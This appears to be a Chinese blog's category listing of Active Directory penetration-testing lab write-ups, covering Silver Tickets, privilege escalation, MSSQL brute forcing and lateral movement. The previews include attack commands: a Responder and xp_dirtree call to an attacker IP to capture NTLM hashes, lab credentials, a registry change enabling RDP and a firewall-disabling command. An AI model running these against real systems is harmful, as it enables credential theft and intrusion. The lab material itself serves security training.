AD域渗透共39篇 第2页
对 Active Directory 身份验证执行攻击4 Silver Tickets-白鸢的笔记

对 Active Directory 身份验证执行攻击4 Silver Tickets

在对 Active Directory 身份验证执行攻击3中,我们获取并破解了 TGS-REP 哈希以检索 SPN 的明文密码。我们将更进一步,伪造我们自己的服务票证。 Kerberos 身份验证的内部工作原理,在服务帐户...
zhyann的头像-白鸢的笔记钻石会员zhyann1年前
07911
Medtech 堡垒机 seimpersonateprivilege 提权-白鸢的笔记

Medtech 堡垒机 seimpersonateprivilege 提权

靶场信息外网三台主机地址 1. 漏洞挖掘与利用扫描VM4gobuster vm4sqlmap注入可以爆破 先尝试能不能拿到NTLMhash先监听接口responder -I tun0exec master..xp_dirtree '\\192.168.45.229\test'...
zhyann的头像-白鸢的笔记钻石会员zhyann1年前
0718
PsLoggedOn-白鸢的笔记

PsLoggedOn

NetSessionEnum 会在高版本的操作系统不起作用我们可以使用PsLoggedOn工具来代替 PsLoggedOn简介PsLoggedOn 将在HKEY_USERS下枚举注册表项,以检索登录用户的安全标识符 (SID)并将 SID 转换...
zhyann的头像-白鸢的笔记钻石会员zhyann1年前
0546
红日靶场3 补充 mssql爆破-白鸢的笔记

红日靶场3 补充 mssql爆破

在win2008上扫描到了mssql 使用之前收集到的用户名和密码testuser cvcvgjASD!@wwwuser wwwuser_123Aqx 直接复制到/tmp/user.txt中use auxiliary/scanner/mssql/mssql_login set rhosts 192.16...
zhyann的头像-白鸢的笔记钻石会员zhyann1个月前
0519
域控制器同步-白鸢的笔记

域控制器同步

在生产环境中,域通常依赖多个域控制器来提供冗余。 目录复制服务 (DRS) 远程协议使用复制来同步这些冗余域控制器。 域控制器可能会请求更新使用 IDL_DRSGetNCChanges API 的特定对象,例如帐户...
zhyann的头像-白鸢的笔记钻石会员zhyann1年前
08210
红日靶场1.1 mysql拿到reverseshell-白鸢的笔记

红日靶场1.1 mysql拿到reverseshell

实验环境1. 信息收集由于我当时没注意到是win7是入口机器 所以先扫描windows server 2003nmap -T5 -A -p- -n -vvv -noscript 192.168.52.141先从ftp开始发现可以匿名登录 但是里面是空的简单爆...
zhyann的头像-白鸢的笔记钻石会员zhyann1个月前
04214
通过服务主体名称进行枚举-白鸢的笔记

通过服务主体名称进行枚举

独立应用程序可以使用一组预定义的服务帐户,例如LocalSystem、LocalService、和 NetworkService。对于更复杂的应用程序,可以使用域用户帐户来提供所需的上下文,同时仍然保持对域内资源的访问...
zhyann的头像-白鸢的笔记钻石会员zhyann1年前
05912
红日靶场7.2-白鸢的笔记

红日靶场7.2

PC2攻击扫描的时候发现有ms17-010漏洞使用正向shell的meterpreter就可以http://www.zhyann.net/index.php/2025/06/15/%e7%ba%a2%e6%97%a5%e9%9d%b6%e5%9c%ba4-2-%e9%9a%a7%e9%81%93%e5%bb%ba%e7...
zhyann的头像-白鸢的笔记钻石会员zhyann1个月前
03913
Active Directory 中的横向移动1 WMI 和 WinRM-白鸢的笔记

Active Directory 中的横向移动1 WMI 和 WinRM

我们方法中合乎逻辑的下一步是破解我们获得的任何密码哈希值,并使用明文密码对计算机进行身份验证,以获得未经授权的访问。然而,密码破解需要时间并且可能会失败。此外,Kerberos和 NTLM 不直...
zhyann的头像-白鸢的笔记钻石会员zhyann1年前
06613
红日靶场1.2 横向突破DC-白鸢的笔记

红日靶场1.2 横向突破DC

前期准备发现我是administrator上传mimikatz.exe 允许RDPreg add 'HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server' /v 'fDenyTSConnections' /t REG_DWORD /d 0 /f 关闭防火墙netsh ...
zhyann的头像-白鸢的笔记钻石会员zhyann1个月前
03710